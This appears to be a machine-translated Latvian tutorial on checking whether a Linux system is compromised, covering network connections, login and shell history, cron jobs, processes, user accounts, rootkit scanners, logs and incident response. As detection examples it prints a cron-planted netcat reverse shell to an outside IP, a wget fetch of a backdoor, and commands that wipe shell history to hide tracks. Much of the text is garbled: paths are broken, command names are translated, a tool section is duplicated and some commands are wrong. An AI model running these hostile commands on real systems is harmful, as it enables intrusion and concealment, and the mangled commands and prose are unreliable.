Kā noteikt, vai Linux sistēma ir apdraudēta

Ir daudz iemeslu, kāpēc hakeris tārpotu ceļu jūsu sistēmā un sagādātu jums nopietnas nepatikšanas. Pirms gadiem varbūt tas bija jāparāda savas prasmes, taču mūsdienās šādu darbību nodomi var būt daudz sarežģītāki, un upurim ir daudz plašākas sekas. Tas var izklausīties acīmredzami, bet tas, ka “viss šķiet labi”, nenozīmē, ka viss ir kārtībā. Hakeri var iekļūt jūsu sistēmā, neziņojot par to un inficējot to ar ļaunprātīgu programmatūru, lai iegūtu pilnīgu kontroli un pat sānu pārvietošanos starp sistēmām. Ļaunprātīgā programmatūra var būt paslēpta sistēmā un kalpo kā aizmugure vai komandu un vadības sistēma hakeriem ļaunprātīgu darbību veikšanai jūsu sistēmā.Labāk ir būt drošam nekā nožēlot. Iespējams, uzreiz nenojautīsit, ka jūsu sistēma ir uzlauzta, taču ir daži veidi, kā jūs varat noteikt, vai jūsu sistēma ir apdraudēta. Šajā rakstā tiks apspriests, kā noteikt, vai jūsu Linux sistēmu ir pārkāpusi nepiederoša persona, vai robots piesakās jūsu sistēmā, lai veiktu ļaunprātīgas darbības.

Netstat

Netstat ir svarīga komandrindas TCP / IP tīkla utilīta, kas sniedz informāciju un statistiku par izmantotajiem protokoliem un aktīvajiem tīkla savienojumiem.

Mēs izmantosim netstat upura mašīnas piemērā, lai pārbaudītu, vai aktīvajos tīkla savienojumos nav aizdomīgu lietu, izmantojot šādu komandu:

[e-pasts aizsargāts]: ~ $ netstat -antp

Šeit mēs redzēsim visus pašlaik aktīvos savienojumus. Tagad mēs meklēsim savienojums, kam tur nevajadzētu būt.

Šeit tas ir, aktīvs savienojums PORT 44999 (osta, kurai nevajadzētu būt atvērtai).Mēs varam redzēt citu informāciju par savienojumu, piemēram, PID, un programmas nosaukums, ko tā darbojas, pēdējā slejā. Šajā gadījumā PID ir 1555 un tā palaistā ļaunprātīgā krava ir ./ apvalks.elfs failu.

Vēl viena komanda, lai pārbaudītu, vai porti pašlaik klausās un darbojas jūsu sistēmā, ir šāda:

[e-pasts aizsargāts]: ~ $ netstat -la

Tas ir diezgan netīrs iznākums. Lai filtrētu klausīšanās un izveidotos savienojumus, mēs izmantosim šādu komandu:

[e-pasts aizsargāts]: ~ $ netstat -la | grep “KLAUSĪTIES” “IZVEIDOTI”

Tas sniegs jums tikai tos rezultātus, kas jums ir svarīgi, lai jūs varētu vieglāk kārtot šos rezultātus. Mēs varam redzēt aktīvu savienojumu osta 44999 iepriekš minētajos rezultātos.

Pēc ļaunprātīgā procesa atpazīšanas jūs varat nogalināt procesu, izmantojot šādas komandas. Mēs atzīmēsim PID procesu, izmantojot komandu netstat, un nogaliniet procesu, izmantojot šādu komandu:

[e-pasts aizsargāts]: ~ $ kill 1555

~.bash-vēsture

Linux reģistrē, kuri lietotāji sistēmā pieteicās, no kāda IP, kad un cik ilgi.

Šai informācijai varat piekļūt, izmantojot Pēdējais komandu. Šīs komandas izvade izskatās šādi:

[e-pasts aizsargāts]: ~ $ last

Izejā tiek parādīts lietotājvārds pirmajā kolonnā, termināls otrajā, avota adrese trešajā, pieteikšanās laiks ceturtajā slejā un kopējais sesijas laiks, kas reģistrēts pēdējā kolonnā. Šajā gadījumā lietotāji usman un ubuntu joprojām esat pieteicies. Ja redzat kādu sesiju, kas nav autorizēta vai izskatās ļaunprātīga, skatiet šī raksta pēdējo sadaļu.

Mežizstrādes vēsture tiek saglabāta mapē ~.bash-vēsture failu. Tātad vēsturi var viegli noņemt, izdzēšot .bash-vēsture failu. Šo darbību uzbrucēji bieži veic, lai noslēptu pēdas.

[aizsargāts ar e-pastu]: ~ $ cat .bash_history

Šī komanda parādīs komandas, kas palaistas jūsu sistēmā, un jaunākā komanda tiek veikta saraksta beigās.

Vēsturi var notīrīt, izmantojot šādu komandu:

[e-pasts aizsargāts]: ~ $ history -c

Šī komanda izdzēsīs vēsturi tikai no tā termināļa, kuru pašlaik izmantojat. Tātad, ir pareizāks veids, kā to izdarīt:

[aizsargāts pa e-pastu]: ~ $ cat / dev / null> ~ /.bash_history

Tas notīrīs vēstures saturu, bet saglabās failu vietā. Tātad, ja pēc. Palaišanas redzat tikai savu pašreizējo pieteikuminformāciju Pēdējais komandu, tā nebūt nav laba zīme. Tas norāda, ka jūsu sistēma varētu būt apdraudēta un ka uzbrucējs, iespējams, izdzēsis vēsturi.

Ja jums ir aizdomas par ļaunprātīgu lietotāju vai IP, piesakieties kā šis lietotājs un palaidiet komandu vēsture, sekojoši:

[e-pasts aizsargāts]: ~ $ su
[e-pasts aizsargāts]: ~ $ vēsture

Šī komanda parādīs komandu vēsturi, lasot failu .bash-vēsture iekš /mājas šī lietotāja mapi. Uzmanīgi meklējiet wget, čokurošanās, vai netcat komandas, ja uzbrucējs izmantoja šīs komandas failu pārsūtīšanai vai repo rīku, piemēram, kriptogrāfu vai surogātpasta robotu, instalēšanai.

Apskatiet šo piemēru:

Virs, jūs varat redzēt komandu “wget https: // github.com / sajith / mod-rootme.” Šajā komandā hakeris mēģināja piekļūt failam no repo, izmantojot wget lai lejupielādētu aizmugurējo durvju nosaukumu “mod-root me” un instalētu to savā sistēmā. Šī komanda vēsturē nozīmē, ka sistēma ir apdraudēta, un uzbrucējs to ir izveidojis.

Atcerieties, ka šo failu var ērti izraidīt vai ražot tā vielu. Šīs komandas sniegtos datus nedrīkst uzskatīt par noteiktu realitāti. Tomēr gadījumā, ja uzbrucējs izpildīja “sliktu” komandu un novārtā atstāja evakuāciju, tas būs tur.

Krona darbs

Cron darbi var būt svarīgs rīks, ja tie ir konfigurēti tā, lai uzbrucēja mašīnā izveidotu reverso apvalku. Cron darbu rediģēšana ir svarīga prasme, tāpat kā zināt, kā tos apskatīt.

Lai skatītu pašreizējam lietotājam darbojošos cron darbus, mēs izmantosim šādu komandu:

[aizsargāts ar e-pastu]: ~ $ crontab -l

Lai skatītu cron darbus, kas darbojas citam lietotājam (šajā gadījumā Ubuntu), mēs izmantosim šādu komandu:

[aizsargāts ar e-pastu]: ~ $ crontab -u ubuntu -l

Lai skatītu ikdienas, stundas, nedēļas un mēneša cron darbus, mēs izmantosim šādas komandas:

Ikdienas Cron darba vietas:

[e-pasts aizsargāts]: ~ $ ls -la / etc / cron.katru dienu

Stundas Cron darbavietas:

[aizsargāts ar e-pastu]: ~ $ ls -la / etc / cron.katru stundu

Nedēļas Cron darba vietas:

[aizsargāts pa e-pastu]: ~ $ ls -la / etc / cron.iknedēļas

Veikt piemēru:

Uzbrucējs var ievietot krona darbu / etc / crontab kas izpilda ļaunprātīgu komandu 10 minūtes pēc katras stundas. Uzbrucējs var arī palaist ļaunprātīgu pakalpojumu vai reverso čaulas aizmugurējo durvju netcat vai kāda cita lietderība. Izpildot komandu $ ~ crontab -l, jūs redzēsiet cron darbu, kas darbojas zem:

[aizsargāts ar e-pastu]: ~ $ crontab -l
CT = $ (crontab -l)
CT = $ CT $ '\ n10 * * * * nc -e / bin / bash 192.168. lpp.8.131 44999 ”
printf "$ CT" | crontab -
ps aux

Lai pareizi pārbaudītu, vai jūsu sistēma nav apdraudēta, ir svarīgi apskatīt arī notiekošos procesus. Ir gadījumi, kad daži neautorizēti procesi nepietiek CPU izmantošanas, lai tiktu iekļauti tops komandu. Tieši šeit mēs izmantosim ps komandu, lai parādītu visus pašlaik notiekošos procesus.

[e-pasts aizsargāts]: ~ $ ps auxf

Pirmajā slejā tiek parādīts lietotājs, otrajā - unikāls procesa ID, un nākamajās slejās tiek parādīts CPU un atmiņas lietojums.

Šī tabula sniegs jums visvairāk informācijas. Jums jāpārbauda katrs darbības process, lai atrastu kaut ko savdabīgu, lai uzzinātu, vai sistēma ir apdraudēta vai nav. Ja jums šķiet kaut kas aizdomīgs, googlējiet to vai palaidiet to ar lsof komandu, kā parādīts iepriekš. Tas ir labs ieradums skriet ps komandas savā serverī, un tas palielinās jūsu izredzes atrast kaut ko aizdomīgu vai ārpus ikdienas rutīnas.

/ etc / passwd

The / etc / passwd fails seko līdzi katram sistēmas lietotājam. Šis ir ar kolu atdalīts fails, kas satur tādu informāciju kā lietotājvārds, userid, šifrēta parole, GroupID (GID), pilns lietotāja vārds, lietotāja mājas katalogs un pieteikšanās čaula.

Ja uzbrucējs ielaužas jūsu sistēmā, pastāv iespēja, ka viņš vai viņa izveidos vēl dažus lietotājus, lai saglabātu lietas atsevišķi vai izveidotu jūsu sistēmā aizmugurējo durvju, lai atgrieztos, izmantojot šo aizmugurējo durvju. Pārbaudot, vai jūsu sistēma nav apdraudēta, jums jāpārbauda arī visi lietotāji failā / etc / passwd. Lai to izdarītu, ierakstiet šādu komandu:

[aizsargāts ar e-pastu]: ~ $ cat etc / passwd

Šī komanda sniegs jums izvadi, kas ir līdzīgs zemāk redzamajam:

gnome-initial-setup: x: 120: 65534 :: / run / gnome-initial-setup /: / bin / false
gdm: x: 121: 125: Gnome displeja pārvaldnieks: / var / lib / gdm3: / bin / false
usman: x: 1000: 1000: usman: / home / usman: / bin / bash
postgres: x: 122: 128: PostgreSQL administrators ,,,: / var / lib / postgresql: / bin / bash
debian-tor: x: 123: 129 :: / var / lib / tor: / bin / false
ubuntu: x: 1001: 1001: ubuntu ,,,: / home / ubuntu: / bin / bash
lightdm: x: 125: 132: Light Display Manager: / var / lib / lightdm: / bin / false
Debian-gdm: x: 124: 131: Gnome displeja pārvaldnieks: / var / lib / gdm3: / bin / false
anonīms: x: 1002: 1002: ,,,: / home / anonīms: / bin / bash

Tagad jūs vēlaties meklēt jebkuru lietotāju, par kuru jūs nezināt. Šajā piemērā varat redzēt lietotāju failā ar nosaukumu “anonīms.”Vēl viena svarīga lieta, kas jāņem vērā, ir tas, ka, ja uzbrucējs izveidoja lietotāju, lai atkal pieteiktos, lietotājam tiks piešķirta arī“ / bin / bash ”čaula. Tātad, jūs varat sašaurināt meklēšanu, satverot šādu rezultātu:

[aizsargāts ar e-pastu]: ~ $ cat / etc / passwd | grep -i "/ bin / bash"
usman: x: 1000: 1000: usman: / home / usman: / bin / bash
postgres: x: 122: 128: PostgreSQL administrators ,,,: / var / lib / postgresql: / bin / bash
ubuntu: x: 1001: 1001: ubuntu ,,,: / home / ubuntu: / bin / bash
anonīms: x: 1002: 1002: ,,,: / home / anonīms: / bin / bash

Jūs varat veikt vēl kādu “bash magic”, lai uzlabotu savu rezultātu.

[aizsargāts ar e-pastu]: ~ $ cat / etc / passwd | grep -i "/ bin / bash" | izgriezt -d ":" -f 1
usman
postgres
ubuntu
Anonīms

Atrodiet

Ātra šķirošana ir noderīga, pamatojoties uz laiku. Lietotājs var arī modificēt failu mainot laika zīmogus. Lai uzlabotu uzticamību, kritērijos iekļaujiet ctime, jo to ir daudz grūtāk mainīt, jo tas prasa dažu līmeņu failu modifikācijas.

Lai atrastu pēdējās 5 dienās izveidotos un modificētos failus, varat izmantot šo komandu:

[aizsargāts ar e-pastu]: ~ $ find / -mtime -o -ctime -5

Lai atrastu visus saknes īpašumā esošos SUID failus un pārbaudītu, vai sarakstos nav neparedzētu ierakstu, mēs izmantosim šādu komandu:

[aizsargāts ar e-pastu]: ~ $ find / -perm -4000 -user root -type f

Lai atrastu visus saknei piederošos SGID (set user ID) failus un pārbaudītu, vai sarakstos nav neparedzētu ierakstu, mēs izmantosim šādu komandu:

[aizsargāts ar e-pastu]: ~ $ find / -perm -6000 -type f

Chkrootkit

Sakņu komplekti ir viena no vissliktākajām lietām, kas var notikt sistēmai, un ir vieni no visbīstamākajiem uzbrukumiem, bīstamāki par ļaunprogrammatūru un vīrusiem, gan to radītajos bojājumos, gan grūtībās tos atrast un atklāt.

Tie ir veidoti tā, ka tie paliek paslēpti un veic ļaunprātīgas darbības, piemēram, kredītkaršu un tiešsaistes bankas informācijas zagšanu. Sakņu komplekti dod kibernoziedzniekiem iespēju kontrolēt jūsu datorsistēmu. Rootkit arī palīdz uzbrucējam uzraudzīt jūsu taustiņsitienus un atspējot antivīrusu programmatūru, kas vēl vairāk atvieglo jūsu privātās informācijas nozagšanu.

Šāda veida ļaunprātīgas programmatūras var palikt jūsu sistēmā ilgu laiku, lietotājam pat nemanot, un var radīt nopietnus zaudējumus. Kad Rootkit tiek atklāts, nav citas iespējas, kā pārinstalēt visu sistēmu. Dažreiz šie uzbrukumi pat var izraisīt aparatūras kļūmi.

Par laimi ir daži rīki, kas var palīdzēt to atklāt Sakņu komplekti Linux sistēmās, piemēram, Lynis, Clam AV vai LMD (Linux Malware Detect). Jūs varat pārbaudīt, vai sistēmā ir zināms Sakņu komplekti izmantojot tālāk norādītās komandas.

Vispirms instalējiet Chkrootkit izmantojot šādu komandu:

[aizsargāts ar e-pastu]: ~ $ sudo apt install chkrootkit

Tas instalēs Chkrootkit rīks. Jūs varat izmantot šo rīku, lai pārbaudītu Rootkits, izmantojot šādu komandu:

[aizsargāts ar e-pastu]: ~ $ sudo chkrootkit

Chkrootkit pakotne sastāv no čaulas skripta, kas pārbauda, vai sistēmas bināros failos nav modificētas rootkit, kā arī no vairākām programmām, kas pārbauda dažādas drošības problēmas. Iepriekš minētajā gadījumā pakete sistēmā pārbaudīja rootkit pazīmi un neatrada nevienu. Nu, tā ir laba zīme!

Linux žurnāli

Linux žurnāli sniedz notikumu grafiku Linux darba ietvarā un lietojumprogrammās, un tie ir svarīgs izmeklēšanas instruments, kad rodas problēmas. Galvenajam uzdevumam, kas administratoram jāveic, kad viņš vai viņa uzzina, ka sistēma ir apdraudēta, jāizdala visi žurnāla ieraksti.

Attiecībā uz darba zonas lietojuma nepārprotamām problēmām žurnālu ieraksti tiek uzturēti saziņā ar dažādām jomām. Piemēram, pārlūks Chrome veido avāriju pārskatus '~ /.hroma / avārijas pārskati '), kur darba apgabala lietojumprogramma veido žurnālus, balstoties uz inženieri, un parāda, vai lietojumprogramma ņem vērā pielāgotu žurnālu izkārtojumu. Ieraksti atrodas/ var / log direktorijā. Ir Linux žurnāli visam: ietvars, daļa, saiņu priekšnieki, sāknēšanas formas, Xorg, Apache un MySQL. Šajā rakstā tēma tieši koncentrēsies uz Linux ietvara žurnāliem.

Izmantojot kompaktdisku pasūtījumu, varat pāriet uz šo katalogu. Lai skatītu vai mainītu žurnālfailus, jums ir jābūt root tiesībām.

[aizsargāts ar e-pastu]: ~ $ cd / var / log

Norādījumi par Linux žurnālu skatīšanu

Izmantojiet šīs komandas, lai skatītu nepieciešamos žurnāla dokumentus.

Linux žurnālus var redzēt ar komandu cd / var / log, tajā brīdī, sastādot secību, lai redzētu zem šī kataloga ievietotos žurnālus. Viens no nozīmīgākajiem žurnāliem ir syslog, kas reģistrē daudzus svarīgus žurnālus.

ubuntu @ ubuntu: kaķu syslog

Lai dezinficētu produkciju, mēs izmantosimmazāk ” komandu.

ubuntu @ ubuntu: kaķu syslog | mazāk

Ierakstiet komandu var / log / syslog lai redzētu diezgan daudz lietu zem syslog fails. Koncentrēšanās uz konkrētu jautājumu prasīs zināmu laiku, jo šis ieraksts parasti būs garš. Nospiediet Shift + G, lai ierakstā ritinātu uz leju līdz END, ko apzīmē ar “END.”

Tāpat jūs varat redzēt žurnālus, izmantojot dmesg, kas izdrukā detaļas gredzena atbalstu. Šī funkcija izdrukā visu un nosūta jūs pēc iespējas tālāk pa dokumentu. No šī brīža jūs varat izmantot pasūtījumu dmesg | mazāk lai apskatītu ražu. Gadījumā, ja jums ir jāredz konkrētā lietotāja žurnāli, jums būs jāizpilda šāda komanda:

dmesg - objekts = lietotājs

Noslēgumā jūs varat izmantot astes kārtību, lai skatītu žurnāla dokumentus. Tā ir niecīga, tomēr noderīga lietderība, ko var izmantot, jo to izmanto, lai parādītu pēdējo žurnālu daļu, kur problēma, visticamāk, radās. Varat arī norādīt astes komandā parādāmo pēdējo baitu vai rindu skaitu. Lai to izdarītu, izmantojiet komandu tail / var / log / syslog. Ir daudz veidu, kā aplūkot žurnālus.

Konkrētam rindu skaitam (modelis ņem vērā pēdējās 5 rindas) ievadiet šādu komandu:

[aizsargāts ar e-pastu]: ~ $ tail -f -n 5 / var / log / syslog

Tas izdrukās pēdējās 5 rindas. Kad nāk vēl viena rinda, iepriekšējā tiks evakuēta. Lai izvairītos no astes kārtības, nospiediet Ctrl + X.

Svarīgi Linux žurnāli

Galvenie četri Linux žurnāli ietver:

Lietojumprogrammu žurnāli
Notikumu žurnāli
Pakalpojumu žurnāli
Sistēmas žurnāli

ubuntu @ ubuntu: kaķu syslog | mazāk

/ var / log / syslog vai / var / log / messages: vispārīgi ziņojumi, tāpat kā ar sistēmu saistīti dati. Šis žurnāls glabā visu darbību informāciju visā pasaulē.

ubuntu @ ubuntu: kaķu aut.žurnāls | mazāk

/ var / log / auth.žurnāls vai / var / log / drošs: glabāt verifikācijas žurnālus, iekļaujot gan efektīvus, gan fiziskus pieteikumvārdus un validācijas stratēģijas. Debian un Ubuntu lietošana / var / log / auth.žurnāls glabāt pieteikšanās mēģinājumus, kamēr Redhat un CentOS izmanto / var / log / drošs glabāt autentifikācijas žurnālus.

ubuntu @ ubuntu: kaķu zābaki.žurnāls | mazāk

/ var / log / boot.žurnāls: satur informāciju par sāknēšanu un ziņojumus startēšanas laikā.

ubuntu @ ubuntu: kaķu maillog | mazāk

/ var / log / maillog vai / var / log / mail.žurnāls: glabā visus žurnālus, kas identificēti ar pasta serveriem; vērtīgs, ja jums ir nepieciešami dati par postfix, smtpd vai visām ar e-pastu saistītajām administrācijām, kas darbojas jūsu serverī.

ubuntu @ ubuntu: kaķu kodols | mazāk

/ var / log / kern: satur informāciju par kodola žurnāliem. Šis žurnāls ir svarīgs, lai izpētītu pielāgotās daļas.

ubuntu @ ubuntu: kaķis dmesg | mazāk

/ var / log / dmesg: satur ziņojumapmaiņu, kas identificē sīkrīka draiverus. Dmesg secību var izmantot, lai skatītu ziņojumus šajā ierakstā.

ubuntu @ ubuntu: kaķu faillog | mazāk

/ var / log / faillog: satur datus par visiem burbuļojošajiem pieteikšanās mēģinājumiem, kas ir noderīgi, lai iegūtu zināšanas par drošības iekļūšanas mēģinājumiem; piemēram, tie, kas vēlas uzlauzt pieteikšanās sertifikātus, tāpat kā dzīvnieku spēka uzbrukumi.

ubuntu @ ubuntu: cat cron | mazāk

/ var / log / cron: saglabā visus ar Cron saistītos ziņojumus; piemēram, cron nodarbinātība vai kad cron dēmons uzsāka aicinājumu, saistītie vilšanās ziņojumi utt.

ubuntu @ ubuntu: kaķis yum.žurnāls | mazāk

/ var / log / yum.žurnāls: ja neizdodas ieviest komplektus, izmantojot yum pasūtījumu, šajā žurnālā tiek glabāti visi saistītie dati, kas var būt noderīgi, lai izlemtu, vai saišķis un visi segmenti tika efektīvi ieviesti.

ubuntu @ ubuntu: kaķis httpd | mazāk

/ var / log / httpd / vai / var / log / apache2: šie divi direktoriji tiek izmantoti, lai saglabātu visu veidu žurnālus Apache HTTP serverim, ieskaitot piekļuves žurnālus un kļūdu žurnālus. Failā error_log ir visi sliktie pieprasījumi, kurus saņēmis http serveris. Šīs kļūdas ietver atmiņas problēmas un citas ar sistēmu saistītas kļūdas. Access_log satur visu pieprasījumu, kas saņemti, izmantojot HTTP, ierakstu.

ubuntu @ ubuntu: kaķis mysqld.žurnāls | mazāk

/ var / log / mysqld.žurnāls vai/ var / log / mysql.žurnāls : MySQL žurnāla dokuments, kurā tiek reģistrēti visi kļūmes, atkļūdošanas un veiksmes ziņojumi. Tas ir vēl viens gadījums, kad ietvars novirza uz reģistru; RedHat, CentOS, Fedora un citi uz RedHat balstītie ietvari izmanto / var / log / mysqld.log, savukārt Debian / Ubuntu izmanto / var / log / mysql.žurnālu katalogs.

Rīki Linux žurnālu skatīšanai

Mūsdienās ir pieejami daudzi atvērtā koda žurnālu izsekotāji un pārbaudes ierīces, padarot pareizos darbību žurnālu aktīvus vienkāršākus, nekā jūs varētu domāt. Bezmaksas un atvērtā koda žurnālu pārbaudītāji var strādāt jebkurā sistēmā, lai paveiktu darbu. Šeit ir pieci labākie, kurus esmu izmantojis agrāk, nekādā konkrētā secībā.

GRAYLOG

Sācis Vācijā 2011. gadā, Graylog tagad tiek piedāvāts vai nu kā atvērtā koda ierīce, vai kā biznesa vienošanās. Graylog ir paredzēts kā apvienota, reģistrēšanās-padomes sistēma, kas saņem informācijas plūsmas no dažādiem serveriem vai galapunktiem un ļauj ātri pārskatīt vai sadalīt šos datus.

Graylog ir ieguvis pozitīvu atpazīstamību starp rāmju vadītājiem tā vienkāršības un daudzpusības dēļ. Lielākā daļa tīmekļa uzņēmumu sākas maz, tomēr var attīstīties eksponenciāli. Graylog var pielāgot kaudzes virs aizmugures serveru sistēmas un katru dienu apstrādāt dažus terabaitus žurnāla informācijas.

IT priekšsēdētāji redzēs, ka GrayLog saskarnes priekšējā daļa ir tik vienkārši izmantojama un enerģiska tās lietderībā. Graylog strādā ar informācijas paneļu ideju, kas ļauj lietotājiem izvēlēties svarīgu mērījumu veidu vai informācijas avotus un pēc kāda laika ātri novērot slīpumus.

Kad notiek drošības vai izpildes epizode, IT priekšsēdētājiem jābūt iespējai sekot izpausmēm līdz galvenajam draiverim cik ātri vien pamatoti varēja sagaidīt. Graylog meklēšanas funkcija padara šo uzdevumu vienkāršu. Šis rīks ir darbojies, pielāgojoties iekšējām neveiksmēm, ar kurām var vadīt vairāku virkņu pasākumus, lai jūs kopā varētu sadalīt dažas iespējamās briesmas.

NAGIOS

Nagios, kuru 1999. gadā sāka viens izstrādātājs, kopš tā laika ir kļuvis par vienu no stabilākajiem atvērtā pirmkoda instrumentiem žurnāla informācijas pārraudzībai. Pašreizējo Nagios pārsūtīšanu var ieviest serveros, kuros darbojas jebkura veida operētājsistēma (Linux, Windows utt.).

Nagios būtiskais elements ir žurnāla serveris, kas racionalizē informācijas sortimentu un pakāpeniski padara datus pieejamus ietvara vadītājiem. Nagios žurnāla servera motors pakāpeniski uztvers informāciju un ievadīs to revolucionārā meklēšanas instrumentā. Iekļaušana citā galapunktā vai lietojumprogrammā ir vienkārša dzeramnauda šim raksturīgajam vienošanās vednim.

Nagios bieži izmanto asociācijās, kurām jāpārbauda apkārtnes drošība, un tās var pārskatīt ar sistēmu saistītu gadījumu klāstu, lai palīdzētu robotizēt brīdinājumu sniegšanu. Nagios var ieprogrammēt veikt noteiktus uzdevumus, kad ir izpildīts noteikts nosacījums, kas lietotājiem ļauj atklāt problēmas pat pirms tiek iekļautas cilvēka vajadzības.

Kā galveno sistēmas novērtēšanas aspektu Nagios novirzīs žurnāla informāciju atkarībā no ģeogrāfiskā apgabala, kurā tā sākas. Lai redzētu tīmekļa trafika straumēšanu, var ieviest pilnīgus informācijas paneļus ar kartēšanas jauninājumiem.

LOGALĪZE

Logalyze ražo atvērtā pirmkoda rīkus galvenajiem direktoriem, administratoriem un drošības speciālistiem, lai palīdzētu viņiem pārraudzīt servera žurnālus un ļautu viņiem koncentrēties uz žurnālu pārveidošanu vērtīgā informācijā. Šī rīka būtiskais elements ir tas, ka tas ir pieejams kā bezmaksas lejupielāde mājas vai biznesa vajadzībām.

Nagios būtiskais elements ir žurnālu serveris, kas racionalizē informācijas sortimentu un pakāpeniski padara datus pieejamus ietvara vadītājiem. Nagios žurnāla servera motors pakāpeniski uztvers informāciju un ievadīs to revolucionārā meklēšanas instrumentā. Iekļaušana citā galapunktā vai lietojumprogrammā ir vienkārša dzeramnauda šim raksturīgajam vienošanās vednim.

Kā galveno sistēmas novērtēšanas aspektu Nagios virzīs žurnāla informāciju atkarībā no ģeogrāfiskā apgabala, kurā tā sākas. Lai redzētu tīmekļa trafika straumēšanu, var ieviest pilnīgus informācijas paneļus ar kartēšanas jauninājumiem.

Kā rīkoties, ja esat nonācis kompromitā?

Galvenais nav panikas, it īpaši, ja nepiederoša persona ir pierakstījusies tieši tagad. Jums vajadzētu būt iespējai atkārtoti kontrolēt iekārtu, pirms otra persona zina, ka jūs par viņu zināt. Gadījumā, ja viņi zina, ka esat informēts par viņu klātbūtni, uzbrucējs var arī atturēt jūs no servera un sākt iznīcināt jūsu sistēmu. Ja jūs neesat tik tehnisks, tad viss, kas jums jādara, ir nekavējoties jāslēdz viss serveris. Serveri var izslēgt, izmantojot šādas komandas:

[aizsargāts ar e-pastu]: ~ $ shutdown -h tagad

[aizsargāts ar e-pastu]: ~ $ systemctl izslēgšana

Vēl viens veids, kā to izdarīt, ir piesakoties sava mitināšanas pakalpojumu sniedzēja vadības panelī un no turienes to izslēgt. Kad serveris ir izslēgts, varat strādāt ar nepieciešamajiem ugunsmūra noteikumiem un savā laikā konsultēties ar jebkuru citu.

Ja jūtaties drošāk un jūsu mitināšanas pakalpojumu sniedzējam ir augšpusē esošs ugunsmūris, izveidojiet un iespējojiet šādus divus noteikumus:

Atļaut SSH trafiku tikai no jūsu IP adreses.
Bloķējiet visu pārējo, ne tikai SSH, bet katru protokolu, kas darbojas katrā portā.

Lai pārbaudītu aktīvas SSH sesijas, izmantojiet šādu komandu:

[e-pasts aizsargāts]: ~ $ ss | grep ssh

Izmantojiet šo komandu, lai nogalinātu viņu SSH sesiju:

[e-pasts aizsargāts]: ~ $ kill

Tas nogalinās viņu SSH sesiju un ļaus jums piekļūt serverim. Ja jums nav piekļuves augšpusē esošam ugunsmūrim, jums būs jāizveido un jāiespējo ugunsmūra noteikumi pašā serverī. Tad, kad ir izveidoti ugunsmūra noteikumi, nogaliniet nesankcionētā lietotāja SSH sesiju, izmantojot komandu “nogalināt”.

Ja iespējams, pierakstieties serverī, izmantojot ārpus joslas savienojumu, piemēram, seriālo konsoli, ja tāda ir pieejama. Pārtrauciet visu tīklu izveidi, izmantojot šādu komandu:

[aizsargāts ar e-pastu]: ~ $ systemctl apturēt tīklu.apkalpošana

Tas pilnībā apturēs jebkuras sistēmas nokļūšanu pie jums, tāpēc tagad jūs savā laikā varētu iespējot ugunsmūra vadīklas.

Kad atgūsiet kontroli pār serveri, neuzticieties tam viegli. Nemēģiniet salabot lietas un izmantot tās atkārtoti. To, kas ir salauzts, nevar salabot. Jūs nekad nezināt, ko uzbrucējs varētu darīt, un tāpēc nekad nevajadzētu būt drošam, ka serveris ir drošībā. Tātad pārinstalēšanai vajadzētu būt jūsu pēdējam solim.